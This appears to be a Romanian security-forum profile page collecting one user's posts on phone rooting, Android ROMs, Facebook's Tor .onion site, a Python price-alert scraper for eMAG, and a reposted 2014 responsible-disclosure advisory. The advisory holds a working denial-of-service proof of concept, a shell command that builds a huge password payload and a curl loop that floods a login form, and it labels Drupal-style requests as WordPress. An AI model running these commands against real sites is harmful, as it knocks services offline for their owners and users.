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Posts posted by LLegoLLaS

  1. Ar trebui si titlul modificat,e tool specific pentru un anumit model.Ceilalti producatori,prin modificarile de firmware,repara uneori bugurile astea si se pot roota doar cu vulnerabilitati ale firmware-ului respectiv

    sfat: nu incercati toolu' ala pe alte teelfoane decat huawei

  2. ====================================================================
    A vulnerability present in Wordpress < 4.0.1 allows an
    attacker to send specially crafted requests resulting in CPU and memory
    exhaustion. This may lead to the site becoming unavailable or
    unresponsive (denial of service).

    Time Line:

    November 20, 2014 - A Wordpress security update and the security
    advisory is published.

    Proof of Concept:
    Generate a pyaload and try with a valid user:

    echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
    {1..1000000} >> valid_user_payload && echo -n "&op=Log
    in&form_id=user_login" >> valid_user_payload

    Perform a Dos with a valid user:

    for i in `seq 1 150`; do (curl --data @valid_user_payload
    [url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done


    -- Javer Nieto -- [url=http://www.behindthefirewalls.com]Hacking while you're asleep[/url]
    -- Andres Rojas -- [url=http://www.devconsole.info]# /dev/console | "In the beginning … Was the command line" (Neal Stephenson)[/url]


    * [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url]

    * [url]https://www.drupal.org/SA-CORE-2014-006[/url]

    [url=http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html]Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]

    [url=http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html]Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]

    * [url=http://www.devconsole.info/?p=1050]Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console[/url]


  3. #!/usr/bin/env python
    import smtplib
    import urllib2
    import random
    import re
    import time
    #panou de configurare
    email = " " #unde vrei sa primesti ofertele
    smtp = "smtp.gmail.com"
    loginuser = "@gmail.com"
    loginpass = ""
    chilipir = 25 #pretul(ron) sub care sunteti anuntat
    interval_timp_cautare = 600 # in secunde
    print r"""
    #...Cautatoru de chilipiruri 1.2...#--/\
    def email_sender(TEXT):
    #print TEXT
    message = 'To:' + email + '\n' + 'From: ' + loginuser + '\n' + 'Subject:Chilipir \n\n' + TEXT
    server = smtplib.SMTP(smtp, 587)
    server.login(loginuser, loginpass )
    server.sendmail(loginuser, email, message)
    print "Oferta a fost expediata"
    expediate = []
    while True :
    expediat = ""
    random_nr = str(random.randint(10**16,99999999999999999))
    ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \
    %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17])
    site = "http://www.emag.ro/resigilate/sort-priceasc"
    req = urllib2.Request(site, None, {'User-Agent' : ua})
    continut = urllib2.urlopen(req, timeout=30).read()
    match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut)
    for every in match:
    pret, link = every
    if int(pret) <= chilipir:
    link = "http://www.emag.ro" + link
    unic = str(pret) + link
    if unic not in expediate:
    expediat += str(pret) + "\t" + link +"\n"
    except Exception as E:
    if len(expediat) >= 1:
    print time.strftime("%c"), "nimic nou"

    adaptare sa mearga cu cont de gmail


    daca e cont nou posibil sa nu mearga prima data (blocheaza loginul,nefiind secure) si sa primiti un mail cu Enable less Secure Access.Dupa ce bifati mere

    • Upvote 1
  4. de ce sa nu upgradezi la android 5.0 lolipop?

    pentru ca probabil nu l-a portat nimeni pe 4x HD.Din ce sitiu e bazat pe nvidia tegra deci e mai greu. @vHacker vezi xda developpers.acolo o sa gasesti multe romuri si moduri pentru telefonul tau

  5. The so-called darknet, which is accessible via the anonymizing Tor network, has a reputation for being home to many disreputable sites. But now the biggest social network in the world is available via Tor. Facebook announced Friday that it is available to Tor users via a .onion address--the pseudo-top-level-domain used by Tor hidden services.

    Anyone wishing to connect to Facebook via Tor can do so by typing https://facebookcorewwwi.onion/ into their web browser when connected to Tor (it won't work otherwise). Facebook says Tor users who visit the social network's .onion site are protected with end-to-end encryption since the .onion site connects directly to a Facebook data center via SSL.

    Facebook's new .onion site makes it easier for users to connect to the social network via Tor without running into problems. Facebook's security systems, for example, may flag a Tor-connecting account for being hacked. Like a hacked account, Tor user traffic can appear to be coming from several different countries in a short period of time.

    Why this matters: Facebook's very nature as a social network where anonymity is shunned may seem a strange candidate for creating a Tor site. But there are many reasons to connect to Facebook as securely as possible without revealing your location despite the loss of anonymity on Facebook itself. Participants in the 2011 protests against the Mubarak regime in Egypt, for example, used Facebook to mobilize protesters and inform the public.

    A first for SSL

    Facebook's SSL connection via Tor is also a first for the world of .onion sites. The social network's Tor hidden service is the first .onion address to receive a legitimate SSL certificate from an issuing certificate authority, according to a tweet from Runa Sandvik, who contributes to the Tor Project.

    An SSL certificate is used by your browser to verify that you are connecting to the site you think you are. Facebook says it wanted to use an SSL certificate that cites its .onion address to give users confidence that they were indeed connecting to Facebook and not a malicious imitation.

    sursa: pcworld

    ce cacat mai vor?

  6. Am votat da pentru motivele date de voi ma sus.

    Dar daca stau sa ma gandesc mai bine,RST e forum de securitate it.Una din ideile fundamentale ale securitatii online e anonimitatea.Dup-aia v-aud cu topicuri "A gasit mama un cacat in cutia postala insotit de un bilet de amenintare.Ce pot face?"

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